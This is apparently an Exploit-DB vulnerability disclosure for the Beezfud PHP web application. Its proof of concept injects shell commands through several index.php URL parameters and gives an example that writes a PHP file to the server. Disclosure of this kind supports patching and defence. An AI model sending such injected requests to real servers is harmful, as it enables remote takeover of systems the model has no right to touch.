Beezfud - Remote Code Execution

Author: Ashiyane Digital Security Team
type: webapps
platform: php
port: 80.0
date_added: 2015-12-24  
date_updated: 2015-12-26  
verified: 0  
codes: OSVDB-132294  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.combeezfud-master.zip  

raw file: 39093.txt  

================================================================================
# Beezfud Remote Code Execution
================================================================================
# Vendor Homepage: https://github.com/EVA-01/beezfud
# Date: 23/12/2015
# Software Link: https://github.com/EVA-01/beezfud/archive/master.zip
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
# Source: http://ehsansec.ir/advisories/beezfud-exec.txt
================================================================================
# Vulnerable File : index.php

# PoC :

http://localhost/beezfud/index.php?parameter=;Command;

Vulnerable Parameters : lookback , max , range , latest , earliest


Example :

http://localhost/beezfud/index.php?lookback=;echo '<?php phpinfo();
?>' >info.php;

================================================================================
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
================================================================================